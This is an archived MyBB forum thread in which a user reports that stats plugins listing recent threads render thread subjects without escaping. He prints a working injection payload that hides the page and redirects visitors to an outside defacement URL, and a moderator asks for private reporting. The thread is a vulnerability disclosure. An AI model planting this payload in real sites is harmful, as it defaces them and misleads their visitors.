MyBB Community Forums

MyBB Community Forums > Extensions > Plugins > Plugin Development > Bugs in Stats Plugins
Full Version: Bugs in Stats Plugins
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

Kerio

2014-09-12, 06:42 PM
Cool Hello!
Toungue Hello Kerio Big Grin
Cool (I sure you saw this bug in your forum!)
Toungue (Excuse Me! Which Bug?)
Cool (Wait My dear!)

Cool This bug is:
- somebody come and create a thread with this subject:
- <style>*{display:none}</style><meta http-equiv="refresh" content="0; url=http://upload.com/deface.html" />
- and your site redirect to deface page!

Toungue (No!!! What should we do?)
Cool (You can wait for plugin's developers to fix this bug! or change max length of thread subject to 20! And they can't use this bug!)

Toungue (Which Plugins Have This Bug?)
Cool  (Every Plugins For Show Stats (last threads) Have This Bug! Dont Worry! Developers Will be at work.)

Destroy666

2014-09-12, 09:58 PM
Ok..

But if you really found a plugin with XSS vulnerability, please find it in the new mods base, use the report button and in the reason field include some proofs (for example the line number in a file). Or do the same in Private Inquiries: http://community.mybb.com/forum-135.html Thanks in advance.
MyBB Community Forums > Extensions > Plugins > Plugin Development > Bugs in Stats Plugins